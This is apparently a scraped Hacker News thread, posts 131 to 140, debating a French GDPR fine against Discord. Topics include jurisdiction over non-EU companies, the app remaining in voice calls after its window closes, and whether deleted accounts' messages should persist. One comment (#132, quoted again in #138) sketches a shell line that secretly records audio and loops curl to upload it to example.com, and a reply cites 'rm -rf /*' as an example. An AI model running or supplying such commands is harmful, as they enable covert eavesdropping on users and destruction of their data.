Live data from Hacker News

Discord fined €800k for failing to comply with several obligations of the GDPR

cnil.fr

131–140 of 306 posts

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#131
post #38

So if I’m an American company and have no offices in Europe and ignore GDPR for my free customers, what happens? Will I get arrested by the Polizei when I land in Berlin? Will the US force me to pay these fines?

My question as well. Can a non-EU company simply refuse to pay, and also refuse to block users from the EU? I wonder if the EU would decide to block access to the foreign service as a result. It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

> It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

This happened a long time ago. And it was started by the US, I'm quite sure.

More than that, the American way to manage the "global network" is basically to impose US laws everywhere in the world.

You can receive DMCA notices outside the US, for example.

Or even crazier: https://en.wikipedia.org/wiki/United_States_v._Elcom_Ltd.

Someone arrested, in the US, for a "crime" in another country, that wasn't even a crime in his country.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#132

Earlier quoted context omitted.

Something like: nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done & Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere? Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to jus…

> that's enough for a GDPR violation I guess? No, you would also need to run on computers of people not understanding what is going on. In the same way as running > rm -rf /* on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.

Did the users choose to install the Discord app (or run a random command?)

How are you supposed to confirm "user understanding"?

Does the program need to require a tutorial/training before it's being used?

A user's ignorance shouldn't be a software distributor's problem.

If the discord app didn't have a system tray, and hid it's process from the Process List someway, maybe you have a point - this is just ignorance across the board.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#133
Some questions I need answered, that have yet to be answered in the article, or the comments here:

Does Discord have an officially established business presence in the EU? That is, do they have an office? Employees? Remote workers officially living in the EU? A business license of some sort?

One of the large questions here, entirely separate from the validity of the technical issues is of jurisdiction, and the answers are extremely unsatisfying.

Edit: Yes, I understand that the GDPR claims jurisdiction. But this isn't my question. My question is also not, "does Discord have customers in the EU", or even "...run servers located in the EU".

My question is only, "does Discord have an established business in the EU?" I was unable to find an answer with a short search, and I'm unsure where to look.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#134

Does Discord even have a corporate presence in the EU? For the French government to be fining companies because they happen to dislike the UI is such a random and unpredictable decision that it seems like a strong signal for US firms to not set up offices in the EU at all.

> Does Discord even have a corporate presence in the EU?

They keep bothering me to pay for Nitro and just pushed a notification that they've added new payment options for my country, so they're clearly targeting the EU market.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#135
post #3

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applicatio…

Somehow I missed the part of the "very easy to understand and straightforward GDPR" that prohibits this. I've been saying all along that this regulation is dangerously boundless, but I can't wait for someone to justify to me why this actually makes total sense.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#136
post #117

Sorry but the points are totally valid. If you delete your account your messages are still available with a userid that if someone has it can be traced back to you. They also don't delete files or pictures you uploaded alone for this they should get fined.

But it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them. It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is s…

if they want it to work as you posit, they should not save all the date in Discords systems, but create a distributed chat system.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#137
post #3

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applicatio…

> The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.

TBF I've been saved a few times from losing all my browser state by accidentally hitting cmd-Q.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#138

Earlier quoted context omitted.

> that's enough for a GDPR violation I guess? No, you would also need to run on computers of people not understanding what is going on. In the same way as running > rm -rf /* on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.

Did the users choose to install the Discord app (or run a random command?) How are you supposed to confirm "user understanding"? Does the program need to require a tutorial/training before it's being used? A user's ignorance shouldn't be a software distributor's problem. If the discord app didn't have a system tray, and hid it's process from the Process List someway, maybe you have a point - this is just ignorance ac…

> A user's ignorance shouldn't be a software distributor's problem.

Deliberately causing user's ignorance should be a software distributor's problem.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#139
post #127
post #117

Earlier quoted context omitted.

But it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them. It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is s…

I agree with you in principle and I think that the EU is basically extorting American companies, but in your example all that information is stored in your phone, while in this case the information is stored in Discord's servers.

Right which to me is a distinction without a difference. If you and me are both Gmail users and you send me an email then delete your account should Gmail have to reach into my inbox and delete your emails? They’re on Google’s servers after all.

Re: Discord fined €800k for failing to comply with several obligations of the GDPR

#140
post #117

Earlier quoted context omitted.

But it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them. It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is s…

if they want it to work as you posit, they should not save all the date in Discords systems, but create a distributed chat system.

What’s the difference between Discord and two Gmail users communicating? The data is all on Google’s servers.

If we work on a Google Doc together should deleting your account delete my document as well? They’re both on Google’s servers and on the backend we don’t have separate copies.

Post reply on HN